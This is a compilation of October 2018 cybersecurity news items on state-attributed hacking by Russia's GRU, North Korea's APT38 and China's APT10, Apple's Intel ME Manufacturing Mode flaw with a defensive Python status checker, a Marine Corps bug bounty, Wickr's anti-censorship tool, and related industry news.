Allies accused Russian military intelligence of being behind an April attempt to gain access to official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

The Netherlands expelled four alleged agents and Britain and Australia pointed fingers at Russian military intelligence, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The Russia-based Fancy Bears computer hacking group leaked athletes' medical records held by WADA, said the agency.

The same year, the Canadian Centre for Ethics in Sport was "compromised by malware enabling unauthorized access to the Centre's network," the foreign ministry said.

WADA has faced a backlash over its decision last month to lift a ban on Russia's anti-doping agency.

The agency had suspended RUSADA in November 2015 after declaring it non-compliant following revelations of a vast state-backed scheme to avoid drug testers.

A WADA report by Canadian lawyer Richard McLaren accused Russian authorities of running an elaborate doping program with the full support of the Russian Ministry of Sport and the Russian secret service (FSB).

The softening of WADA's stance triggered outrage from athletes and national anti-doping agencies around the world, who have accused WADA of succumbing to pressure from the IOC.


US to Let NATO Use its Cyber Defense Skills
5.10.2018 securityaffairs
BigBrothers

The United States is expected to make its offensive cyber warfare capabilities available to NATO, officials said Wednesday, as the alliance seeks to strengthen its defenses against Russian electronic attacks.

Britain and Denmark have already publicly committed cyber resources to NATO, and Washington is expected to announce that it will follow suit on Thursday at a meeting of defence ministers in Brussels.

Alliance chief Jens Stoltenberg said cyber attacks on NATO countries were becoming "more frequent... more sophisticated... more coercive" and any contribution of cyber capabilities was welcome.

"We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict," Stoltenberg said.

The three Baltic states -- Lithuania, Latvia and Estonia -- say they come under near-daily cyber assault, with government departments, banking systems and the power grid coming in for attack, and point the finger at former Soviet ruler Russia.

Moscow is also blamed for interfering in various European elections through campaigns of disinformation on social media.

Most recently, Washington accused Russia of leading a disinformation campaign in Macedonia through social media to discourage voters from taking part in last weekend's referendum on changing the country's name.

The name change is crucial to Macedonia's hopes of joining NATO -- a step Moscow opposes.


North Korean Attacks on Banks Attributed to 'APT38' Group
5.10.2018 securityweek
APT

A report published on Wednesday by FireEye details the activities of a financially motivated threat actor believed to be operating on behalf of the North Korean government.

The group, tracked by FireEye as APT38, focuses on targeting financial institutions, and the company’s researchers estimate that it has stolen at least a hundred million dollars from banks worldwide. It’s believed that the group has attempted to steal over $1.1 billion.

Much of the North Korea-linked cyber activity has been attributed to the notorious Lazarus, but cybersecurity firms have begun to realize that, similar to other countries, there are actually several groups that appear to be launching attacks on behalf of the government. The fact that their tools, techniques and infrastructure often overlap makes it difficult to accurately attribute an operation to a certain group.

FireEye noted that there are many similarities between APT38 and attacks launched by other North Korea-linked groups, including Lazarus and the activity it tracks as TEMP.Hermit. However, it believes APT38’s tools and its tactics, techniques and procedures (TTPs) are distinct enough for it to be tracked separately.

Some other security firms have also noticed that the financially motivated attacks linked to Lazarus may have actually been carried out by a subgroup of Lazarus. Kaspersky has tracked this subgroup as Bluenoroff, while CrowdStrike has dubbed it Stardust Chollima. CrowdStrike has been tracking a total of four subgroups, which it has named Stardust Chollima, Silent Chollima, Labyrinth Chollima and Ricochet Chollima.

According to FireEye, APT38 has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries – researchers believe the actual number of targets may be higher.

APT 38 targets

Several of these attacks made headlines in the past years and the researchers who analyzed them reported seeing significant similarities to Lazarus campaigns. However, FireEye says the attacks were actually carried out by APT38. The attacks, many of which targeted the SWIFT banking system, were aimed, among others, at Vietnam’s TP Bank in 2015, Bangladesh’s central bank in 2016, Taiwan’s Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile also in 2018.

“Attribution to both the ‘Lazarus’ group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations,” FireEye said in its report on APT38. “Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”

FireEye believes that several other attacks that made the news – involving banks in Africa, Vietnam, Malaysia, the Philippines, Ecuador, and India – may have also been carried out by APT38 based on timing, location, malware, general TTPs and the fact that they targeted SWIFT systems.

Unlike other North Korean threat groups, APT38’s attacks are almost exclusively cyber heists whose likely goal is to raise money for the regime. On the other hand, unlike typical cybercrime operations, APT38’s campaigns are more similar to espionage.

“APT38 executes sophisticated bank heists typically featuring long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards,” FireEye said.

Experts believe APT38 was created by North Korea as a result of the sanctions imposed on the country. The group was first spotted in February 2014, roughly one year after the UN blocked the regime from making bulk cash transfers and restricting its ties to international banking systems. As more and more sanctions were imposed on North Korea in the following years, APT38 escalated its activities and the frequency of attacks increased.

FireEye has warned that APT38 continues to be active, even after the United States named and charged an alleged North Korean hacker who is said to have been involved in the development of Lazarus tools.


Canada blames Russia for cyber attacks against its structures
5.10.2018 securityweek
BigBrothers

The Government of Canada blamed the GRU, the Russian military’s intelligence agency, for cyber attacks at the Montreal-based World Anti-Doping Agency.
“The government of Canada assesses with high confidence that the Russian military’s intelligence arm, the GRU, was responsible” for these cyber attacks, the foreign ministry said in a statement.

The statement describes the cyber attacks as “part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order.”

It also called on “all those who value this order to come together in its defence.”

Canada and its allies accused Russia of an aggressive cyber strategy that continuously attempts to interfere in the politics of foreign states. The allies

Allies blamed the Kremlin for an April attempt to gain access to the official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

In September the Dutch-based NRC newspaper and the Swiss daily Tages-Anzeiger reported that the Dutch intelligence services had arrested two alleged Russian spies working for Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts investigations for a global chemical arms watchdog, the Organisation for the Prohibition of Chemical Weapons (OPCW); its researchers were investigating the poisoning of former agent Sergei Skripal and his daughter in Salisbury.

The two agents carried equipment to hack into the network of the laboratory to spy on the activity of its researchers.

The Netherlands expelled four alleged agents, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The foreign ministry added that in the same period the Canadian Centre for Ethics in Sport was “compromised by malware enabling unauthorized access to the Centre’s network.”

Britain and Australia also accused the Russian military intelligence of running a massive espionage campaign.


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
5.10.2018 securityweek
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies, while analyzing the Intel Management Engine (ME), discovered that Apple had not closed Manufacturing Mode on its laptops.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip and its integrated peripherals; it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts have warned in the past of the risks posed by Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published proof-of-concept exploit code for a JTAG-related vulnerability in the Intel Management Engine.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that this security framework (HAP) was developed by the US National Security Agency … yes, the NSA!

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post that revealed Chipzilla’s ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to access Intel Manufacturing Mode is a utility included in the Intel ME System Tools software, which is not available to the public. The software allows platform settings to be configured in one-time programmable memory called Field Programming Fuses (FPF), an operation usually performed before shipment, and in the ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel kept the access rights for the Intel Management Engine, Gigabit Ethernet, and CPU separate.

In newer systems, the SPI controllers implement the Master Grant feature that could override the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

Experts pointed out that device makers that fail to disable Manufacturing Mode open the door to cyber attacks by a local attacker.

Ironically, one of Intel’s major customers, Apple, left Manufacturing Mode enabled; the issue is tracked as CVE-2018-4251.

Apple addressed the problem in June and fixed it with the release of macOS High Sierra 10.13.5 update.

The security experts published Python code on GitHub to allow users of Intel systems to check whether Manufacturing Mode is enabled.

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even ‘bricking’ of hardware,” the experts conclude.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”
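As an added example (not the Positive Technologies checker or any Intel code), the following Python decodes the ME’s HFSTS1 status register, which a local check of this kind reads from the ME device’s PCI configuration space, and reports whether the Manufacturing Mode bit is set. The device address 0000:00:16.0, the register offset 0x40 and the bit layout (mfg_mode at bit 4, as in coreboot’s me.h) are assumptions, and the sample register values are constructed.

```python
"""Decode the Intel ME "Host Firmware Status 1" (HFSTS1) register and report
whether Manufacturing Mode is still enabled.

Added illustration, not Positive Technologies' published tool. Assumptions:
the ME/HECI PCI function is at 0000:00:16.0 and HFSTS1 is the little-endian
dword at config-space offset 0x40, with the bit layout used by coreboot's me.h.
"""
from dataclasses import dataclass
from pathlib import Path

# Assumed sysfs path of the ME/HECI device's PCI configuration space (Linux).
MEI_PCI_CONFIG = Path("/sys/bus/pci/devices/0000:00:16.0/config")
HFSTS1_OFFSET = 0x40

# Current working state (bits 0-3) and operation mode (bits 16-19), per coreboot's me.h.
WORKING_STATES = {0: "reset", 1: "init", 2: "recovery", 5: "normal",
                  6: "disable wait", 7: "transition", 8: "invalid"}
OPERATION_MODES = {0: "normal", 2: "debug", 3: "disabled (soft temp)",
                   4: "override via jumper", 5: "override via MEI"}


@dataclass(frozen=True)
class HfSts1:
    working_state: int       # bits 0-3
    mfg_mode: bool           # bit 4: Manufacturing Mode enabled
    fpt_bad: bool            # bit 5: flash partition table bad
    fw_init_complete: bool   # bit 9
    error_code: int          # bits 12-15
    operation_mode: int      # bits 16-19


def decode_hfsts1(value: int) -> HfSts1:
    """Split the raw 32-bit HFSTS1 value into its fields."""
    return HfSts1(
        working_state=value & 0xF,
        mfg_mode=bool((value >> 4) & 1),
        fpt_bad=bool((value >> 5) & 1),
        fw_init_complete=bool((value >> 9) & 1),
        error_code=(value >> 12) & 0xF,
        operation_mode=(value >> 16) & 0xF,
    )


def hfsts1_from_config_space(raw: bytes) -> int:
    """Extract HFSTS1 from a raw PCI config-space dump of the ME device.

    Unprivileged users only see the first 64 bytes of config space on Linux,
    which is exactly where HFSTS1 begins, so a short dump is an error here.
    """
    if len(raw) < HFSTS1_OFFSET + 4:
        raise ValueError("config space dump too short to contain HFSTS1 (need root?)")
    return int.from_bytes(raw[HFSTS1_OFFSET:HFSTS1_OFFSET + 4], "little")


def assess(status: HfSts1) -> str:
    """One-line verdict a fleet inventory could log or alert on."""
    ws = WORKING_STATES.get(status.working_state, f"unknown({status.working_state})")
    om = OPERATION_MODES.get(status.operation_mode, f"unknown({status.operation_mode})")
    if status.mfg_mode:
        return (f"WARNING: Manufacturing Mode ENABLED (working state {ws}, "
                f"operation mode {om}); platform fuses may still be configurable")
    return f"OK: Manufacturing Mode closed (working state {ws}, operation mode {om})"


def check_local_platform(config_path: Path = MEI_PCI_CONFIG) -> str:
    """Read HFSTS1 from sysfs and assess it (assumed device path, Linux only)."""
    return assess(decode_hfsts1(hfsts1_from_config_space(config_path.read_bytes())))


def constructed_config_space(hfsts1: int) -> bytes:
    """Build a fake 256-byte config-space dump with HFSTS1 at 0x40 (constructed sample)."""
    buf = bytearray(256)
    buf[HFSTS1_OFFSET:HFSTS1_OFFSET + 4] = hfsts1.to_bytes(4, "little")
    return bytes(buf)


# Constructed sample values: working state "normal" (5) with fw_init_complete set,
# once with the mfg_mode bit (bit 4) set and once with it cleared.
SAMPLE_MFG_OPEN = 0x5 | (1 << 4) | (1 << 9)    # 0x215
SAMPLE_MFG_CLOSED = 0x5 | (1 << 9)             # 0x205

if __name__ == "__main__":
    for sample in (SAMPLE_MFG_OPEN, SAMPLE_MFG_CLOSED):
        raw = constructed_config_space(sample)
        print(f"HFSTS1=0x{sample:08x}: {assess(decode_hfsts1(hfsts1_from_config_space(raw)))}")
    try:
        print("This host:", check_local_platform())
    except (OSError, ValueError) as exc:  # non-Linux, no ME device, or not root
        print("Local check skipped:", exc)
```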


UK, Australia Blame Russia for Bad Rabbit, Other Attacks
5.10.2018 securityweek
BigBrothers

The United Kingdom and Australia have officially blamed Russia for several high profile attacks, including the Bad Rabbit ransomware campaign.

A statement published by the U.K. government on Wednesday reveals that the country’s National Cyber Security Centre (NCSC) has linked several cyber threat actors to Russia’s GRU military intelligence service.

The NCSC believes that the GRU is behind the groups tracked by various security firms as APT28, Fancy Bear, Pawn Storm, Sofacy, Sednit, Cyber Caliphate, Cyber Berkut, BlackEnergy, Voodoo Bear, Strontium, Tsar Team and Sandworm. While many of these names represent the same threat actor, the line between the operations carried out by various Russian groups often gets blurred, as shown by the recent VPNFilter attack.

The NCSC says that the GRU is “almost certainly” responsible for the Bad Rabbit ransomware attack in October 2017, the August 2017 attack on the World Anti-Doping Agency (WADA), the 2016 attack on the U.S. Democratic National Committee (DNC), and an attack on a small TV station in the UK in the summer of 2015. It’s worth noting that the U.S. has previously accused Russia of election-related hacks and even charged 12 intelligence officers.

“The GRU’s actions are reckless and indiscriminate: they try to undermine and interfere in elections in other countries; they are even prepared to damage Russian companies and Russian citizens. This pattern of behaviour demonstrates their desire to operate without regard to international law or established norms and to do so with a feeling of impunity and without consequences,” said British Foreign Secretary Jeremy Hunt. “Our message is clear: together with our allies, we will expose and respond to the GRU’s attempts to undermine international stability.”

The Australian government has accused Russia’s GRU of the same attacks, but admitted that Australia itself was not significantly impacted by any of the campaigns.

“Cyberspace is not the Wild West. The International Community – including Russia – has agreed that international law and norms of responsible state behaviour apply in cyberspace. By embarking on a pattern of malicious cyber behaviour, Russia has shown a total disregard for the agreements it helped to negotiate,” reads a statement from Australia’s prime minister and minister of foreign affairs.

Australia says there must be consequences for these types of actions and public attribution is only the first step.

“It is unprecedented that the government should so overtly point the finger directly at the GRU. They must be very confident of their facts, either due to some sort of technical ‘fingerprint’ in the attack vectors themselves, or perhaps through corroboration from various other intelligence sources,” Malcolm Taylor, Director Cyber Advisory at ITC Secure and a former senior British intelligence officer, told SecurityWeek.

“But I think it’s also important to consider who benefits from attacks against these specific targets - WADA, Ukraine and the West in general. The answer to that question of course includes, and may indeed be limited to, Russia and Russian foreign policy interests. The mention of western businesses as targets should also be a reminder that foreign intelligence services do engage in commercial cyber espionage and we all need to take appropriate steps to manage that risk,” Taylor added.


Hackers Earn $150,000 in Marine Corps Bug Bounty Program
5.10.2018 securityweek
Security

The U.S. Department of Defense’s sixth public bug bounty program, Hack the Marine Corps, has concluded, and white hat hackers who took part in the challenge earned more than $150,000.

Hack the Marine Corps was hosted by the HackerOne bug bounty platform and it ran for 20 days. Over 100 experts were invited to test the security of the Marine Corps’ public websites and services and they discovered nearly 150 unique vulnerabilities.

Of the total number of flaws, roughly half were reported during a live hacking event that took place at the DEF CON conference in August. More than $80,000 was awarded for the security holes discovered during the event.

“Hack the Marine Corps was an incredibly valuable experience,” said Major General Matthew Glavy, Commander of the U.S. Marine Corps Forces Cyberspace Command. “When you bring together this level of talent from the ethical hacker community and our Marines we can accomplish a great deal. What we learn from this program assists the Marine Corps in improving our warfighting platform. Our cyber team of Marines demonstrated tremendous efficiency and discipline, and the hacker community provided critical, diverse perspectives. The tremendous effort from all of the talented men and women who participated in the program makes us more combat ready and minimizes future vulnerabilities.”

The Pentagon and HackerOne have been organizing bug bounty programs since 2016, including Hack the Pentagon, Hack the Army, Hack the Air Force, and Hack the Defense Travel System.

The ethical hackers who took part in these challenges discovered more than 5,000 vulnerabilities in government systems, for which they earned over $500,000.


Wickr Announces General Availability of Anti-Censorship Tool
5.10.2018 securityweek
Security

As the balkanization of the internet continues, traveling businessmen are left with concerns over the integrity of their communications from some regions of the globe. Increasing censorship, blocking and other restrictions in many world regions have left internet users unprotected because secure communications are banned.

In some countries such as Saudi Arabia and UAE, says Wickr, enterprise deployments may be difficult because of the national Telco's monopoly over networks. They restrict various end points and UDP, so all traffic goes through them for monetization or tracking purposes. As a result, some customers have to deploy outside of their region (such as India), to avoid having UDP packets get rate-limited and their tools rendered unusable.

To help solve this problem, Wickr has announced the general availability of its secure open access protocol to circumvent censorship for all Wickr Me and Wickr Pro (via admin console) users. It combines unrestricted access and end-to-end encrypted collaboration features in a single app, no matter where users are located.

The enterprise version of the tool was announced in August 2018, with the promise that it would be rolled out to other versions of Wickr, including the free version, in the future. That roll out is confirmed today. The tool comes from Wickr's collaboration with Psiphon. Psiphon describes it as a circumvention tool that utilizes VPN, SSH and HTTP Proxy technology to provide uncensored access to Internet content.

The Psiphon technology uses SSH as its core protocol. This prevents deep packet inspection by ISPs. On top of this, Psiphon has added an obfuscated-openssh layer that transforms the SSH handshake into a random stream, and adds random padding to the handshake.

When a Wickr client starts with Psiphon enabled, the client attempts to connect to up to 10 different servers simultaneously, and uses the first to be fully established. This minimizes user wait time if any of the servers are blocking certain protocols, are blocked by their address, or already running at full capacity and rejecting new connections.

This last point is important. It means that the Wickr/Psiphon product has value beyond just foreign travel. Domestic mobile workers often use low capacity public wifi with limited security. Wickr's encryption can secure the content, while Psiphon ensures minimal delay in the communications.

It is important to note that the Wickr/Psiphon tool is a communication optimization, security and anti-censorship tool -- it is not an anti-law enforcement tool. "Wickr provides full transparency to both law enforcement and our users on the type of metadata that is collected through our products, as well as any data requests we receive," Wallenstrom, CEO and President at Wickr, told SecurityWeek. "The data we capture is very limited in scope to protect user privacy but done in a way that also supports law enforcement."

ISPs, however, remain the weak link in any secret communication. "As to ISPs," continued Wallenstrom, "they are in the business of monetizing user data and were given the green light to do so last year." They can legally collect and sell the data they collect -- but their storage of collected data presents a further risk.

"The risk to users of exposure could be very high and breaches over the years have pretty much confirmed this," he continued. "Short of stopping customer data collection and monetization altogether, ISPs should be transparent about what information they take and ensure proper safeguards are in place. In turn, users can limit their exposure by using privacy tools such as a VPN that masks browsing data from ISPs and encrypted messengers that protect sensitive communications from getting caught in a data sweep."

Psiphon was started more than 10 years ago at Citizen Lab, one of the world's top research hubs dedicated to building anti-surveillance tools. Psiphon was responsible for keeping access to Telegram during Iranian protests, WhatsApp in Brazil and other tools. "There are probably 30 to 40 countries in the world where governments, ISPs and security agencies are all colluding together to control the local population and economy," Michael Hull, president of Psiphon Inc, told SecurityWeek. "This is the problem that Psiphon was founded to solve."

San Francisco-based Wickr was founded in 2011 by Chris Howell, Kara Coppa, Nico Sell, and Robert Statica. It has raised a total of $73 million in venture funding.


CloudKnox Raises $10.8 Million to Help Manage Cloud Privileges
5.10.2018 securityweek
IT

Cloud Security Company Raises $10.75 Million in Funding From ClearSky Security, Dell Technologies Capital and Foundation Capital

Losing control of accounts with elevated privileges is a major concern for all organizations, and can only be solved by enforcing a strict policy of least privilege. That is not easy, and it is even harder in hybrid cloud environments. It has been estimated that there are almost 8,000 separate actions -- or privileges -- available across AWS, Azure, Google Cloud and vSphere. Managing privileges across this many actions is almost impossible manually.

This is the argument behind startup firm CloudKnox Security. Founded in 2016 by Balaji Parimi and headquartered in the San Francisco Bay Area, CloudKnox has now raised $10.8 million in venture funding led by ClearSky Security with participation from Dell Technologies Capital and Foundation Capital. Dell Technologies Capital had been an investor in RedLock, which had raised a total of $12 million. Palo Alto Networks yesterday announced that it had agreed to acquire RedLock for approximately $173 million.

CloudKnox delivers a platform that enables customers to manage the risk of over-provisioning privileges. "Enterprises today are focused on protecting their cloud environments by using tools that provide visibility into anomalous activity and then reacting to it," said Jay Leek, Managing Director at ClearSky Security and former Blackstone CISO. "Security leaders should approach the security of their cloud environments differently by getting ahead of the risks."

The CloudKnox platform uses activity-based access controls to detect identities (service accounts, APIs, bots, contractors or employees) with unused privileges based on actual activities versus static roles. It then allows the automatic revocation of unused high-risk privileges with a single click. The platform, announced the company, "autonomously prevents risks as it learns what activities identities are performing and enables organizations to dynamically and instantly revoke or grant privileges based on actual needs."

The iconic example of abused privilege can be seen in CodeSpaces, which was forced out of business when a hacker gained admin credentials and was able to delete the entire CodeSpaces AWS infrastructure, including backups.

"Today's dynamic infrastructure demands a different approach to manage risks," said Balaji Parimi, CEO and founder of CloudKnox Security. "One key stroke can deploy thousands of cloud workloads and can also destroy thousands of workloads and take down a business. Our approach is built on our belief that enterprises need a single cloud security platform that goes beyond visibility and provides a simple and flexible way to remediate and prevent risks without impacting productivity and trust."


U.S. Charges 7 Russian Intel Officers as West Condemns GRU
5.10.2018 securityweek
BigBrothers

The U.S. Justice Department on Thursday charged seven Russian intelligence officers with hacking anti-doping agencies and other organizations hours after Western officials leveled new accusations against Moscow's secretive GRU military spy agency.

Hours before the U.S. indictment was announced, Western nations accused the GRU of new cybercrimes, with Dutch and British officials labeling the intelligence agency "brazen" for allegedly targeting the international chemical weapons watchdog and the investigation into the 2014 downing of a Malaysian Airlines flight over eastern Ukraine.

The U.S. indictment said that the GRU targeted its victims because they had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned Russia's state-sponsored athlete doping program.

Prosecutors said that the Russians also targeted a Pennsylvania-based nuclear energy company and an international organization that was investigating chemical weapons in Syria and the poisoning of a former GRU officer.

The indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations, with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks.

The GRU's alleged hacking attempts on the Organization for the Prohibition of Chemical Weapons took place in April and were disrupted by authorities, Dutch Defense Minister Ank Bijleveld said. Four Russian intelligence officers were immediately expelled from the Netherlands, she said.

Speaking about Russia's hacking attempts into the MH17 crash investigation, she said: "We have been aware of the interest of Russian intelligence services in this investigation and have taken appropriate measures."

The cascade of condemnation — from the Australian, British and Dutch governments — does more than just point the finger at Moscow. It also ties together a series of norm-shattering spy operations that have straddled the physical world and the digital sphere.

The British ambassador to the Netherlands said that the men caught with spy gear outside The Hague-based OPCW, for example, were from the very same GRU section (Unit 26165) accused by American investigators of having broken into the Democratic National Committee's email and sowing havoc during the 2016 U.S. presidential election.

The OPCW, in turn, was investigating the poisoning of GRU defector Sergei Skripal in which the nerve agent Novichok was used, a bold operation that British authorities dissected in a minute-by-minute surveillance camera montage last month.

At the same time, Australian and British spies have now endorsed the American intelligence community's reported attribution of the catastrophic June 2017 cyberattack on Ukraine (NotPetya) to the GRU. The malicious software outbreak briefly knocked out cash machines, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, dealt $10 billion worth of damage worldwide.

The hack and release of sports figures' medical data in 2016 and the downing of MH17 over eastern Ukraine in 2014 also allegedly carry the GRU's fingerprints. Dutch investigators said the snoopers nabbed outside the OPCW also appear to have logged into the Wi-Fi networks near the World Anti-Doping Agency and the Malaysian hotels where crash investigators had gathered.

Moscow has issued the latest in a series of denials, but the allegations leveled by Western intelligence agencies, supported by a wealth of surveillance footage and overwhelmingly confirmed by independent reporting, paint a picture of the GRU as an agency that routinely crosses red lines — and is increasingly being caught red-handed.

Moscow has denied the allegations, but Russia's interests were at stake in both cases: the OPCW was investigating reports that a Soviet-made nerve agent had been used against a Russian ex-spy in England, and Russia has been blamed by some for being involved in shooting down MH17.

The leaders of Britain and the Netherlands condemned the GRU for "reckless" activities and vowed to defend vital international agencies from Russian aggression.

"This attempt, to access the secure systems of an international organization working to rid the world of chemical weapons, demonstrates again the GRU's disregard for the global values and rules that keep us all safe," British Prime Minister Theresa May and Dutch counterpart Mark Rutte said in a joint statement.

The coordinated actions by both countries came hours before an expected U.S. indictment involving Russian attempts to hack into computer systems.

The Dutch and British blamed Russia's GRU for "brazen" activities across the globe and for trying to cover up Russia's alleged participation in the nerve agent poisoning of Skripal and his daughter in March, and in the downing of MH17 over Ukraine, which killed all 298 people on board during a period of intense fighting between Ukrainian government forces and pro-Russia rebels. Russia has consistently denied involvement in both events.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity. Britain blames the secretive military intelligence unit for the nerve agent attack in March on former Russian spy Skripal and his daughter, Yulia, in the English city of Salisbury.

He said Russia's actions against the Netherlands-based OPCW came as the agency was conducting an independent analysis of the nerve agent used against the Skripals. Britain says the nerve agent was Novichok, produced in the Soviet Union, a finding later confirmed by the chemical weapons watchdog.

Earlier, British Defense Secretary Gavin Williamson branded a series of global cyberattacks blamed on Russia as the reckless actions of a "pariah state," saying that the U.K. and its NATO allies would uncover such activities in the future.

"Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them," Williamson told reporters in Brussels at talks with U.S. Defense Secretary Jim Mattis and their NATO counterparts.

Britain's National Cyber Security Center said Thursday that four new attacks are associated with the GRU as well as earlier security hacks.

It cites attacks on the World Anti-Doping Agency, Ukrainian transport systems, the 2016 U.S. presidential race and others as very likely the work of the GRU.

"We are going to actually make it clear that where Russia acts, we are going to be exposing that action," Williamson said.

"This is not the actions of a great power. This is the actions of a pariah state, and we will continue working with allies to isolate them; make them understand they cannot continue to conduct themselves in such a way," he said.

Earlier, Australian Prime Minister Scott Morrison and Foreign Minister Marise Payne issued a joint statement that Australian intelligence agencies agreed that GRU "is responsible for this pattern of malicious cyber activity." They said Australia wasn't significantly impacted, but the cyberattacks caused economic damage and disrupted civilian infrastructure in other places.


DHS Warns of Attacks on Managed Service Providers
5.10.2018 securityweek
BigBrothers

The United States Department of Homeland Security (DHS) this week issued an alert on ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).

The activity, DHS says, involves attempts to infiltrate the networks of global MSPs, which provide remote management of customer IT and end-user systems.

The use of MSPs extends an organization's virtual enterprise infrastructure, but it also creates a large attack surface for cybercriminals and nation-state actors, DHS' United States Computer Emergency Readiness Team (US-CERT) points out.

The newly released alert, TA18-276B, is related to activity that DHS' National Cybersecurity and Communications Integration Center (NCCIC) warned about in April 2017.

Security firms have associated the same activity with a Chinese actor referred to as APT10, also known as menuPass and Stone Panda. The group is believed to be state-sponsored.

Tracked since 2009, the group has historically targeted mainly Japanese entities. Last year, the group was observed targeting entities in at least fourteen countries, including the website of a prominent U.S. trade association.

The threat actor is known for the use of a broad range of malware families, including the PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler (aka TravNet), and ZeroT.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing,” DHS’ new alert reads.

DHS’ new technical alert also includes information on the protective measures organizations should take to mitigate the risks associated with their MSP, which could expose them to APT activity.

These include restricting access to networks and systems, using a dedicated Virtual Private Network (VPN) for the MSP connection, using firewalls, implementing best practices for password and permission management, and incorporating operational controls.


Google Turns on G Suite Alerts for State-Sponsored Attacks
5.10.2018 securityweek
Attack

After rolling out an option for G Suite administrators to receive alerts on suspected government-backed attacks on their users’ accounts, Google is now turning those alerts on by default.

Google has long warned users of attacks that it believes might be the work of state-sponsored adversaries, but it only sent those alerts to the affected users. Starting in August, it added an option in G Suite to also notify admins of suspected attacks on their users.

When the feature launched in August, however, G Suite administrators had to explicitly enable the alerts to receive them, and it appears that many weren't aware of this and never turned the option on.

“We heard that many admins weren’t aware of this alert and so weren’t receiving this critical information. As a result, we’re going to turn these alerts ON for most admins starting October 10th, 2018,” Google now says.

Admins who do not want to receive these alerts can turn them off from the Reports > Manage alerts > Government-backed attack warning option in the Admin console. They will also have the ability to opt out at any time when receiving an alert email.

The search giant also reveals that the upcoming change won’t override alert preferences that have been explicitly changed before October 10. Basically, this means that the alerts will remain off for those who previously enabled and disabled them.

“If you’d prefer not to receive these alerts after October 10th, simply turn them on and then off again in the Admin console prior to that date,” Google says.

Admins should keep in mind that receiving such an alert does not necessarily mean that an account has been compromised; the warning is also sent when Google merely suspects that an account was targeted by a government-backed attack. Taking additional protective measures, however, is never a bad idea.


China Used Tiny Chips on US Computers to Steal Secrets: Report
5.10.2018 securityweek
BigBrothers

Tiny chips inserted in US computer equipment manufactured in China were used as part of a vast effort by Beijing to steal US technology secrets, a published report said Thursday.

The Bloomberg News report said the chips, the size of a grain of rice, were used on equipment made for Amazon, which first alerted US authorities, and Apple, and possibly for other companies and government agencies.

Bloomberg said a three-year secret investigation, which remains open, found that the chips gave spies a "stealth doorway" into computer equipment, a hardware-based entry point that would be more effective and harder to detect than a software hack.

Citing unnamed US officials, Bloomberg said a unit of the People's Liberation Army was involved in the operation that placed the chips on equipment manufactured in China for US-based Super Micro Computer Inc.

Supermicro, according to Bloomberg, also manufactured equipment for Department of Defense data centers, the CIA's drone operations, and onboard networks of Navy warships.

The report said Amazon discovered the problem when it acquired software firm Elemental and began a security review of equipment made for Elemental by California-based Supermicro.

According to Bloomberg, the spy chips were designed for motherboards -- the nerve centers for computer equipment -- used in data centers operated by Apple, Amazon Web Services and others.

